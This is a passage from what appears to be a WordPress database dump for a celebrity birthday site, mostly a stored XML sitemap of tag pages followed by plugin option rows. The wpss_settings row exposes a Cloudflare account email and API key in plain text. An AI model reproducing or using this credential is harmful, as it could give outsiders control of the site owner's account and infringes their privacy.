<changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/meryl-streep/</loc>\n <lastmod>2015-07-29T12:33:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/meryl-streep-family/</loc>\n <lastmod>2015-07-29T12:33:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mexican-musician/</loc>\n <lastmod>2015-07-23T23:45:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/miami-hurricanes-football-team/</loc>\n <lastmod>2015-07-29T12:23:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mike-tyson/</loc>\n <lastmod>2015-07-29T12:17:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mike-tyson-mysteries/</loc>\n <lastmod>2015-07-29T12:17:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mila-kunis/</loc>\n <lastmod>2015-08-13T19:57:54+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/million-dollar-baby/</loc>\n <lastmod>2015-07-29T13:17:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/miranda-cosgrove/</loc>\n <lastmod>2015-07-29T12:20:51+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/miranda-cosgrove-career/</loc>\n <lastmod>2015-07-29T12:20:51+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mission-imposible-cast/</loc>\n <lastmod>2015-07-23T23:36:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/model/</loc>\n <lastmod>2015-08-13T19:28:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/modelactress/</loc>\n <lastmod>2015-08-11T21:39:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/monica-geller/</loc>\n <lastmod>2015-07-29T12:46:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/morgan-freeman/</loc>\n <lastmod>2015-07-29T13:17:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/morgan-freeman-profession/</loc>\n <lastmod>2015-07-29T13:17:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/most-famous-action-film-star/</loc>\n <lastmod>2015-07-24T00:01:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/most-famous-comedian/</loc>\n <lastmod>2015-07-23T23:45:56+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/most-famous-drummer/</loc>\n <lastmod>2015-07-23T23:11:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/most-famous-skateboarder/</loc>\n <lastmod>2015-07-29T12:19:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/movie-actor/</loc>\n <lastmod>2015-08-20T19:39:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.4</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/movie-actress/</loc>\n <lastmod>2015-08-20T19:12:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/movie-comedian/</loc>\n <lastmod>2015-07-23T23:43:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/movie-director/</loc>\n <lastmod>2015-08-20T19:58:22+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/movie-star/</loc>\n <lastmod>2015-08-20T18:47:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/movies/</loc>\n <lastmod>2015-08-20T19:02:27+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/movies-celebrities/</loc>\n <lastmod>2015-07-29T12:27:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mr-joshua/</loc>\n <lastmod>2015-07-29T12:15:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/mr-t/</loc>\n <lastmod>2015-07-29T12:40:14+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/music-artist-with-criminal-reccord/</loc>\n <lastmod>2015-07-23T23:12:09+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/nancy-shevell/</loc>\n <lastmod>2015-07-29T12:32:30+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/nasty/</loc>\n <lastmod>2015-07-29T12:08:02+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/national-educational-film-festival/</loc>\n <lastmod>2015-07-29T13:15:51+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/national-network-to-end-domestic-violence/</loc>\n <lastmod>2015-07-23T23:55:38+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/nba-player/</loc>\n <lastmod>2015-07-29T11:43:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/new-york-college-of-music/</loc>\n <lastmod>2015-07-29T12:47:48+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/new-york-rapper/</loc>\n <lastmod>2015-07-23T23:12:09+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/nfl/</loc>\n <lastmod>2015-07-29T11:59:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/nfl-draft/</loc>\n <lastmod>2015-07-29T12:23:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ohio-celebrities/</loc>\n <lastmod>2015-07-23T23:52:35+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/pamela-anderson/</loc>\n <lastmod>2015-07-23T22:36:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/party-hoster-at-bloomington-national-guard/</loc>\n <lastmod>2015-07-24T00:02:07+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/paul-mccartney/</loc>\n <lastmod>2015-07-29T12:32:30+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/paula-abdul/</loc>\n <lastmod>2015-07-29T12:08:02+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/pop-music/</loc>\n <lastmod>2015-07-29T12:07:02+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/pop-singer-chris-brown/</loc>\n <lastmod>2015-07-29T12:07:02+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/professional-basketball-player/</loc>\n <lastmod>2015-07-29T11:43:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/professional-soccer-player/</loc>\n <lastmod>2015-07-29T12:37:36+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/professional-wrestler/</loc>\n <lastmod>2015-07-23T23:52:35+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/quinn-fabray/</loc>\n <lastmod>2015-07-29T12:26:39+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/rb/</loc>\n <lastmod>2015-07-29T12:56:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/radio-disney/</loc>\n <lastmod>2015-07-29T12:18:27+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/randall-matthew-jackson/</loc>\n <lastmod>2015-07-29T12:08:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/randy-jackson/</loc>\n <lastmod>2015-07-29T12:08:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/randy-travis/</loc>\n <lastmod>2015-07-29T12:07:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/randy-travis-history/</loc>\n <lastmod>2015-07-29T12:07:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/rap-grammy-award/</loc>\n <lastmod>2015-07-23T23:12:09+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ray-lewis/</loc>\n <lastmod>2015-07-29T12:23:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/reading-berkshire-famous-people/</loc>\n <lastmod>2015-07-29T12:12:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/redhead-celebrities/</loc>\n <lastmod>2015-07-23T22:51:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/rich-people/</loc>\n <lastmod>2015-07-29T12:25:01+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/richest-actor/</loc>\n <lastmod>2015-07-23T23:49:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ricky-gervais/</loc>\n <lastmod>2015-07-29T12:12:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/robert-englund/</loc>\n <lastmod>2015-07-29T13:18:36+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/robert-pattinson/</loc>\n <lastmod>2015-07-29T12:19:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/rock-stars/</loc>\n <lastmod>2015-07-29T12:32:30+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/rocky-iii/</loc>\n <lastmod>2015-07-29T12:40:14+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/rupert-grint/</loc>\n <lastmod>2015-08-20T19:39:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/rythm-and-blues-artist/</loc>\n <lastmod>2015-07-29T12:56:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/sabrina-ann-lynn-carpenter/</loc>\n <lastmod>2015-07-29T12:18:27+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/sabrina-carpenter/</loc>\n <lastmod>2015-07-29T12:18:27+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/santana-g/</loc>\n <lastmod>2015-07-29T12:42:08+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/santana-garrett/</loc>\n <lastmod>2015-07-29T12:42:08+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/saturday-night-live-comedian/</loc>\n <lastmod>2015-07-23T23:43:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/sean-penn/</loc>\n <lastmod>2015-08-13T18:52:17+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/seinfeld/</loc>\n <lastmod>2015-07-29T12:25:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/sexiest-actress/</loc>\n <lastmod>2015-08-11T21:52:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/sexiest-movie-actor/</loc>\n <lastmod>2015-07-29T12:19:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/shaggys-voice/</loc>\n <lastmod>2015-07-29T12:24:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/singer/</loc>\n <lastmod>2015-08-20T20:35:50+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/singer-and-actress-celebrity/</loc>\n <lastmod>2015-07-23T23:52:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/skateboarding-contests/</loc>\n <lastmod>2015-07-29T12:19:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/smack-down-stars/</loc>\n <lastmod>2015-07-23T23:52:35+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/sonny-and-cher/</loc>\n <lastmod>2015-07-29T12:39:21+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/spanish-singer/</loc>\n <lastmod>2015-07-29T11:49:02+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/spurs/</loc>\n <lastmod>2015-07-29T11:43:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/stand-up-comedian/</loc>\n <lastmod>2015-07-29T12:25:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/star-borned-in-bronx/</loc>\n <lastmod>2015-07-23T23:52:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/star-trek/</loc>\n <lastmod>2015-07-29T13:19:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/super-bowl/</loc>\n <lastmod>2015-07-29T12:23:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/ted-prize-winner/</loc>\n <lastmod>2015-07-29T12:49:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/television-celebrity/</loc>\n <lastmod>2015-08-11T20:47:32+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/television-man/</loc>\n <lastmod>2015-07-29T12:45:24+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/terminator/</loc>\n <lastmod>2015-07-24T00:01:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/texas-famous-actors/</loc>\n <lastmod>2015-07-29T12:15:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/the-a-team/</loc>\n <lastmod>2015-07-29T12:40:14+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/the-beatles/</loc>\n <lastmod>2015-07-29T12:32:30+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/the-hangover-cast/</loc>\n <lastmod>2015-07-29T12:17:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/the-hobbit-cast/</loc>\n <lastmod>2015-07-29T12:48:42+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/the-rock/</loc>\n <lastmod>2015-07-29T12:10:47+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tim-burton/</loc>\n <lastmod>2015-08-20T19:58:22+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tim-mcgraw/</loc>\n <lastmod>2015-07-29T12:10:24+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/toby-keith-last-album/</loc>\n <lastmod>2015-07-23T23:22:34+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tony-hawk/</loc>\n <lastmod>2015-07-29T12:19:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tony-hawk-foundation/</loc>\n <lastmod>2015-07-29T12:19:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/top-model/</loc>\n <lastmod>2015-07-29T13:20:29+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/toy-story-voices/</loc>\n <lastmod>2015-07-23T23:33:43+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tupac-amaru-shakur/</loc>\n <lastmod>2015-07-29T12:46:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tupak-shakur/</loc>\n <lastmod>2015-07-29T12:46:55+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tv-actor/</loc>\n <lastmod>2015-08-20T20:12:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tv-actress/</loc>\n <lastmod>2015-08-20T19:18:22+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tv-celebrities/</loc>\n <lastmod>2015-07-29T12:45:24+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tv-comedian/</loc>\n <lastmod>2015-07-29T12:12:33+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tv-shows/</loc>\n <lastmod>2015-08-20T20:12:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/tv-stars/</loc>\n <lastmod>2015-07-29T12:25:01+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/twilight/</loc>\n <lastmod>2015-07-29T12:19:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/twilight-stars/</loc>\n <lastmod>2015-07-29T12:19:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/un-refugee-agency/</loc>\n <lastmod>2015-07-29T13:17:06+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/urban-ac-and-mainstream/</loc>\n <lastmod>2015-07-29T12:08:13+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/us-president/</loc>\n <lastmod>2015-08-11T20:49:19+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/usc-trojan-football-fan/</loc>\n <lastmod>2015-07-23T23:43:45+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/water-for-elephants-cast/</loc>\n <lastmod>2015-07-29T12:19:59+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/whats-new/</loc>\n <lastmod>2015-07-29T12:20:51+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/world-best-singer/</loc>\n <lastmod>2015-07-29T12:57:49+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/world-boxing-council-heavyweight-championship/</loc>\n <lastmod>2015-07-29T12:17:26+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/writer/</loc>\n <lastmod>2015-08-13T19:39:46+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/young-famous-female-singer/</loc>\n <lastmod>2015-07-23T23:46:04+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/youtuber/</loc>\n <lastmod>2015-08-11T20:57:16+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n <url>\n <loc>http://birthdaypedia.com/tag/zachary-quinto/</loc>\n <lastmod>2015-07-29T13:19:15+00:00</lastmod>\n <changefreq>weekly</changefreq>\n <priority>0.2</priority>\n </url>\n</urlset>','no'),(3410,'wpss_db_version','1.2.3','yes'),(3415,'wpss_settings','a:18:{s:16:\"cloudflare_login\";s:17:\"glowens@gmail.com\";s:18:\"cloudflare_api_key\";s:37:\"3acf6ea200fbe602f7037109521b081f727dc\";s:17:\"cloudflare_domain\";N;s:15:\"cloudflare_zone\";s:0:\"\";s:11:\"update_time\";i:1479998439;s:17:\"donotlogout_roles\";N;s:11:\"donotlogout\";s:0:\"\";s:9:\"add_clear\";s:0:\"\";s:16:\"start_immediatly\";i:0;s:9:\"event_log\";s:1:\"0\";s:15:\"event_log_clear\";s:1:\"7\";s:7:\"refresh\";a:11:{s:9:\"post_this\";s:0:\"\";s:14:\"post_add_clear\";s:0:\"\";s:9:\"page_this\";s:0:\"\";s:14:\"page_add_clear\";s:0:\"\";s:20:\"attachment_add_clear\";s:0:\"\";s:12:\"product_this\";s:0:\"\";s:12:\"product_home\";s:0:\"\";s:17:\"product_add_clear\";s:0:\"\";s:27:\"product_variation_add_clear\";s:0:\"\";s:21:\"shop_coupon_add_clear\";s:0:\"\";s:22:\"wooframework_add_clear\";s:0:\"\";}s:8:\"comments\";a:2:{s:12:\"comment_this\";s:0:\"\";s:17:\"comment_add_clear\";s:0:\"\";}s:20:\"comment_manual_scope\";i:0;s:12:\"comment_spam\";i:0;s:16:\"comment_not_spam\";i:0;s:8:\"security\";a:13:{s:21:\"bruteforce_protection\";s:1:\"0\";s:19:\"bruteforce_attempts\";s:2:\"10\";s:16:\"bruteforce_reset\";s:3:\"300\";s:20:\"bruteforce_user_info\";i:0;s:22:\"bruteforce_admin_email\";i:0;s:20:\"bruteforce_all_zones\";i:0;s:15:\"bruteforce_mode\";s:3:\"ban\";s:16:\"login_protection\";s:8:\"disabled\";s:15:\"login_countries\";a:0:{}s:18:\"comment_protection\";s:8:\"disabled\";s:17:\"comment_countries\";a:0:{}s:17:\"xmlrpc_protection\";s:8:\"disabled\";s:16:\"xmlrpc_countries\";a:0:{}}s:8:\"dev_mode\";i:0;}','yes'),(5415,'edcal_count','46','yes'),(5429,'wpseo_taxonomy_meta','a:0:{}','yes'),(6000,'theme_mods_wp-techdesk','a:110:{i:0;b:0;s:12:\"introduction\";s:255:\"<h3 style=\"margin: 0 0 10px;\">Default Background Settings.</h3> The following settings allow you to set the default background behavior for each page. Each of these options can be overridden on the individual post/page/ level. You are in complete control.\";s:11:\"ct_faq_slug\";s:3:\"faq\";s:19:\"ct_homepage_sidebar\";s:10:\"Full 